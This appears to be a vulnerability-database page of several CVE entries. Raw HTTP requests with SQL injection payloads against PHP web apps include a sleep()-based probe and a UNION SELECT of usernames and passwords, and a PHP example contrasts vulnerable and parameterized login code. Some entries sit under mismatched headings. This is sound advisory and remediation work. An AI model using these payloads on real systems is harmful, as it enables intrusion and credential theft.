Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-41511

Vendor

Description:

The username and password field of login in Lodging Reservation Management System V1 can give access to any user by using SQL injection to bypass authentication.
A malicious user can store a malicious payload in the accommodations app and can hijack the PHPSESSID, which he can then use to hijack a login session.

Reproduce:


CVE Proof of Concept:



Now that this has been out and published a bit more, we know that the bug here is that when an attacker uses the legacy task scheduler, the legacy task scheduler fails to impersonate the permissions of the user (as expected) and instead simply runs it as itself: a local administrator. There's a great writeup about it here: https://blog.0patch.com/2019/06/another-task-scheduler-0day-another.html
The TL;DR is that by invoking the legacy task scheduler on Windows 10 <= 1903 in the proper manner as an authenticated user, they can gain execution in the context of the scheduler itself (local administrator).

Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-nu11-101821

Vendor

MySQL Request-1:

POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90

user_email=IlZWXHcK@nu11secur1tycollaborator.net'&user_pass=m2G%21b5m%21D8&btnLogin=%C2%9E%C3%A9e

MySQL Response-1:

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:37 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 7099
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- Bootstrap core CSS -->


<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...
<b>Fatal error</b>: Uncaught Error: Call to undefined function mysql_error() in C:\xampp\htdocs\caiwl\include\accounts.php:28
Stack trace:
#0 C:\xampp\htdocs\caiwl\admin\login.php(165): User::userAuthentication('IlZWXHcK@burpco...', '0314337dea4e6aa...')
#1 {main}
thrown in <b>
...[SNIP]...

MySQL Request-2:

POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90

user_email=ICpueGIm@nu11secur1tycollaborator.net''&user_pass=g1M%21g9l%21F1&btnLogin=%C2%9E%C3%A9e

MySQL Response-2

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:40 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6832
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- Bootstrap core CSS -->


<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...

MySQL Request-3

POST /caiwl/admin/login.php HTTP/1.1
Host: 192.168.1.4
Origin: http://192.168.1.4
Cookie: PHPSESSID=8qen88airh7u0ai06ijhk96a21
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.4/caiwl/admin/login.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90

user_email=QXVzAYzI@nu11secur1tycollaborator.net'%2b(select*from(select(sleep(20)))a)%2b'&user_pass=u0U%21y2z%21D9&btnLogin=%C2%9E%C3%A9e

MySQL Response-3

HTTP/1.1 200 OK
Date: Mon, 18 Oct 2021 07:42:51 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6811
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- Bootstrap core CSS -->


<!DOCTYPE html>
<html lang="en">
<head>
<title>Login V18</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initi
...[SNIP]...

Reproduce


Proof:


Ratings
Technical Analysis

CVE-2021-41947

Description:

A SQL statement in request parameter vulnerability exists in Subrion CMS v4.2.1 in the visual-mode.
This application should not incorporate any user-controllable data directly into SQL queries.
Parameterized queries (also known as prepared statements) should be used to safely insert data into predefined queries.
Under no circumstances should users be able to control or modify the structure of the SQL query itself.

MySQL Request:

GET /panel/visual-mode.json?get=access&type=blocks%27%20UNION%20ALL%20SELECT%20username,%20password%20FROM%20sbr421_members%20--%20-&object=landing_what_is_this&page=index HTTP/1.1
Host: 192.168.1.4
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0

MySQL Response:

HTTP/1.1 200 OK
Date: Sat, 16 Oct 2021 16:40:30 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Set-Cookie: INTELLI_c8e38fc98c=arfqsm98vhdqe3s8kod7nokh56; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: INTELLI_c8e38fc98c=arfqsm98vhdqe3s8kod7nokh56; expires=Sat, 16-Oct-2021 17:10:30 GMT; Max-Age=1800; path=/
Content-Length: 72
Connection: close
Content-Type: application/json

{"error":true,"message":"Action is forbidden.","code":403,"result":true}

Risk:

  • Medium

Reproduce:


Proof

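As an added example (not code from either vendor), the login check that the MySQL Request-1..3 probes above exercise, written twice: the string-concatenated form that the stray quote in Request-1 breaks, and the parameterized form the Subrion analysis recommends. Field names user_email and user_pass come from the requests; the table and column names, the md5() hashing in the vulnerable form, and the SQLite backend are assumptions.

```php
<?php
// Added example, not either vendor's code. Table/column names and md5() are
// assumptions; user_email and user_pass are the field names from the requests.
// Vulnerable: user_email is concatenated into the statement, so the quote in
// Request-1 breaks the query. The original app surfaced that as the fatal
// error in Response-1; with PDO in exception mode it raises a PDOException.
function authenticateVulnerable(PDO $db, string $email, string $pass): ?array
{
    $sql = "SELECT id, user_email FROM users "
         . "WHERE user_email = '$email' AND user_pass = '" . md5($pass) . "'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}
// Hardened: the e-mail is bound as a parameter, so quotes, UNION clauses and
// sleep() calls are compared as plain text against the column. The password is
// checked with password_verify(), never matched inside SQL, and the session id
// is rotated on login so a PHPSESSID observed before authentication is useless.
function authenticateSafe(PDO $db, string $email, string $pass): ?array
{
    $stmt = $db->prepare(
        'SELECT id, user_email, user_pass FROM users WHERE user_email = :email LIMIT 1'
    );
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($pass, $row['user_pass'])) {
        return null;
    }
    if (session_status() === PHP_SESSION_ACTIVE) {
        session_regenerate_id(true);
    }
    unset($row['user_pass']);
    return $row;
}
// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, user_email TEXT, user_pass TEXT)');
$db->prepare('INSERT INTO users (user_email, user_pass) VALUES (?, ?)')
   ->execute(['admin@example.test', password_hash('correct horse', PASSWORD_DEFAULT)]);
$probe = "IlZWXHcK@nu11secur1tycollaborator.net'";   // the user_email value from Request-1
try {
    authenticateVulnerable($db, $probe, 'x');
} catch (PDOException $e) {
    echo "vulnerable: query broken by the quote: ", $e->getMessage(), PHP_EOL;
}
echo "safe, same probe: ", authenticateSafe($db, $probe, 'x') === null ? 'rejected' : 'accepted', PHP_EOL;
echo "safe, valid credentials: ", authenticateSafe($db, 'admin@example.test', 'correct horse') ? 'accepted' : 'rejected', PHP_EOL;
```

Run with `php` and the pdo_sqlite extension; the vulnerable branch prints a syntax error for the probe while the hardened branch simply finds no such user.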

Technical Analysis

This is now being exploited in the wild by the Necro botnet as was reported at https://securityaffairs.co/wordpress/123275/cyber-crime/necro-botnet-dvrs.html